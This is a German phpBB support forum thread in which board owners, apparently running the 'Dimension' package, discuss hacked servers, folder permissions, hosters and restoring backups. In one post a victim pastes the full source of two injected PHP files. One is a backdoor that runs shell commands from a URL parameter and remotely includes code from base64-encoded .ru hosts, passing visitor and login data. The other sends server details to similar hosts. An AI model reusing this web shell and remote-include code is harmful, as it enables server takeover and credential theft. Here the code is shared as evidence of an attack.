Brauche dringend HILFEEEE!!

Allgemeiner Support zum phpBB 2 Board und phpBB 2 Modifikationen
Forumsregeln
Auch wenn hier der Support für phpBB 2 weiterhin aufrecht erhalten bleibt, weisen wir darauf hin, dass das phpBB 2 nicht mehr offiziell unterstützt und weiterentwickelt wird!
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

Die Einträge, die Dir Deine Programme liefern, sind Spy- und Malware auf Deinem Rechner, nicht auf dem Server.
Dort ist die Frage, was genau gemacht wurde.
Hier sollte auch mal ein Blick in die Logs des Webservers geworfen werden.
Provider, die solche Aussagen treffen, sollten gebannt und nach /dev/null geschickt werden.
Da empfehle ich ernsthaft einen Providerwechsel!
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Beitrag von Snoopy »

Vielleicht war die Mitarbeiterin nicht kompetent!

Ich bin ja bei all-ink
Benutzeravatar
oxpus
Administrator
Beiträge: 28737
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus »

all-inkl.com?
Dann ist die kompetent und Du hast wirklich ein Problem mit Deiner Umgebung!
Du solltest dann auch Joomla schnellstens aktualisieren und auf den Supportforen zum System nach Patches fahnden.
Von Joomla hab ich auch so einige Lücken mitbekommen...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Beitrag von Snoopy »

Ich hab gar nichts von Joomla, ichhab dasheut zum erstenmal gehört!


Wie gesagt ich hatte ein Dimension drauf!


Keiner aus meinem Bekanntenkreis kennt die Zugangsdaten, dortwosie drin stehen, kommt keiner ran!
Indextrader
Beiträge: 372
Registriert: Sa 17.Sep, 2005 11:50

Beitrag von Indextrader »

Hi Snoopy

Ich hatte vor Wochen auf meinem lokalen Rechner einen Trojaner, der dauernd selbstständig Spyware installiert hat, der Rechner war kaum noch zu gebrauchen, der Trojaner mit keiner der mir bekannten Virensoftware zu entfernen, teils wurde er nicht einmal erkannt.

Bin dann durch Zufall auf AVG gestossen, meine grosse Rettung.
http://www.grisoft.com/doc/5/lng/de/tpl/tpl01

Diese Software hat gnadenlos alles schädliche in der Testversion entfernt und der Rechner ist wieder völlig sauber, ich war schon kurz davor, den gesamten Rechner platt zu machen und neu aufzusetzen.

Hilft dir natürlich nicht bei deinem Serverproblem, aber eventuell, wenn dein lokaler Rechner das Grundübel ist.

Du kannst die Software 30 Tage lang testen, mit der Testversion habe ich meinen Rechner wieder komplett in Ordnung bekommen und danach die Software sofort gekauft :)

Vielleicht hilft es dir ja

Liebe Grüße und ganz ganz viel Glück, das du dein Board schnell wieder hinbekommst

Uwe......*schwermitfühl*
Benutzeravatar
blondi
Beiträge: 1091
Registriert: Do 30.Sep, 2004 14:36

Beitrag von blondi »

habe das gleiche problem ... ebenfalls dimension
in jedem ordner wurde ein htaccess angelegt sowie 2 datein mit folgenden inhalt

Code: Alles auswählen

<?php 
error_reporting(0); 
if(isset($_POST["l"]) and isset($_POST["p"])){ 
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ." 
&p=". base64_encode(md5($_POST["p"]));} 
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];} 
}else{$user_auth="";} 
if(!isset($_POST["log_flg"])){$log_flg="&log";} 
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . 
 sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME" 
] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) 
{ 
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);} 
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;} 
} 
?>[/code

und in der anderen datei das

[code]<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : 
$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); 
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); 
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : 
$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : 
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : 
$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : 
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : 
$REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".". 
base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f)."." 
.base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw=="). 
base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))) 
{} else {include(base64_decode("aHR0cDovLw==").base64_decode 
("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
man sollte solche menschen 25 jahre einsperren, die wissen garnicht was sie weltweit für schäden anrichten ...

oxpus heute scheint es sehr sehr viele erwischt zu haben, auch bei volkers board sind einige mit dem selben problem ...

bei mir sind alle ordner auf diesen server betroffen inkl. aller domains die dort von mir liegen ...

gruss
Benutzeravatar
Christian_N
Beiträge: 1787
Registriert: Sa 19.Feb, 2005 21:48
Wohnort: Frankfurt am Main
Kontaktdaten:

Beitrag von Christian_N »

Nanana, wie es ausschaut, da Volker auch dimension benutzt wie ich weiss, das wohl oder übel eine lücke in dimension entdeckt wurde, den wie ich bisher mit bekommen sind alle betroffenen dimension boards.
Meine Projekte: Chantals - Fanpage .::. phpBB Projekt
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Beitrag von Snoopy »

Es wurde dort auch geschrieben, das es meist die Dateien waren wo der Ordner die Rechte 777 hat!

Mich hat es leider voll erwischt!
Benutzeravatar
Christian_N
Beiträge: 1787
Registriert: Sa 19.Feb, 2005 21:48
Wohnort: Frankfurt am Main
Kontaktdaten:

Beitrag von Christian_N »

Das problem was ich sehe hierbei nur ist, wenn es eine lücke in dimension ist, das dann backup aufspülen nicht viel bringen, da dann tut man alle Passwörter ändern spült backup auf die Seite steht wieder aber nach paar stunde oder so ist dasselbe problem wieder, da die lücke noch gibt.

Man müsste also wirklich erst die Lücke kennen die der cracker ausnutzt und die muss gestopft werden dann erstmal.

Die frage lautet nur, wie man die am beste jetzt rausfinden kann...
Meine Projekte: Chantals - Fanpage .::. phpBB Projekt
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Beitrag von Snoopy »

Da kann ich nicht behilflich sein, das übersteigt meine kompetenzen!
Benutzeravatar
sausebaby
Beiträge: 5
Registriert: Di 05.Sep, 2006 10:23
Wohnort: Bayern
Kontaktdaten:

Beitrag von sausebaby »

hallöchen

da es auch mich erwischt hatt/e - weiß nicht ob ich den/die endlich ausgesperrt habe. möcht ich
noch schreiben, falls es welche gibt die auf ihren server mehrere sachen außer die dim liegen haben, sollten alle datein geprüft werden.
bei mir war das forum verseucht - mein mysqldumper ornder - mein e-card ordner - und meine bildergallerie.

in allen ordnern mußten teilweise ordner rechte 777 bekommen - und genau da hat der sich mit
einer htaccess und zwei php datein eingenistet.

mysqldumper - ecard und bildergallerie hab ich sofort vom server gelöscht - mein forum bereinigt
nun hoffe ich das ich die türchen zugemacht habe. mal schaun - ich kontrollier jetzt mal öffters
im ftp ob jemand was geändert hat sieht man am datum u. uhrzeit - mal gucken ob der wieder kommt.
mein hoster hat seine ip schon geblockt und bemerkt das der server aus kasatan oder so angegriffen wurde. leider kann er nur mit der ip nichts anfangen meint er. schade
ich find auch die gehören weggesperrt - grrrrr nun muß ich wenn sich alles gelegt hat und wieder sicher ist, meine gelöschten sachen wieder installieren. aber das ist egal wenn nur mein forum gesund bleibt - da steckt so viel arbeit drin.

nun wünsch ich allen betroffenen glück alles wieder hinzubekommen
und allen nicht betroffenen glück das nichts passiert

sausebaby
Benutzeravatar
Snoopy
Beiträge: 1080
Registriert: So 26.Sep, 2004 20:23
Wohnort: Hannover
Kontaktdaten:

Beitrag von Snoopy »

Ich hab ein Problem!

Ich hab jetzt das Backup der Datenbank oben! In der config.php hab ich das neue Passwort für die Datenbank eingeben. Aber mir wird nur eine weiße Seite angezeigt!
Hab ich evtl. was vergessen?
Benutzeravatar
sausebaby
Beiträge: 5
Registriert: Di 05.Sep, 2006 10:23
Wohnort: Bayern
Kontaktdaten:

Beitrag von sausebaby »

das hatte ich gestern in mein forum auch - die activity.php ging einfach nimmer auf.
nur weisse seite
bis wir endlich die datein überspielen konnten die der geändert hat. waren in includes ornder
irgendwelche datein.

wenn das das gleich sein sollte - wir haben 2 stunden gesessen und alle datein angeschaut,
geänderte hochgeladen usw... haben die weisse seite aber wegbekommen.
da hab ich ein super hoster der hat sich echt zeit für genommen.
Benutzeravatar
Some
Beiträge: 95
Registriert: Di 03.Mai, 2005 16:28
Wohnort: Saarbr?cken

Beitrag von Some »

Man müsste also wirklich erst die Lücke kennen die der cracker ausnutzt und die muss gestopft werden dann erstmal.

Die frage lautet nur, wie man die am beste jetzt rausfinden kann...
Ja...grade drum sind mir ja die PN´s oder User-Notizen eingefallen...was höflichst überlesen wurde ;) irgendwo muss da ja einer die daten hergehabt haben...in der config.php die meistens auch davon betroffen war..gibts ja nur die daten der datenbank...nur so wie snoopy das schildert..neue domain angelegt usw...ich mein...bzw.. ich hab z.b. für ftp andere zugangsdaten wie für die datenbank...weiss nicht in wie weit sowas über die datenbank möglich wäre...
Das mit den 777 rechte ordner stimmt da wurden bei einigen bilder gelöscht oder dateien eingepflanzt...aber wie kommt man über diese Ordner an Zugangsdaten???
*Und wenn ihr mich sucht, ich halte mich in der n?he des Wahnsinns auf*
Antworten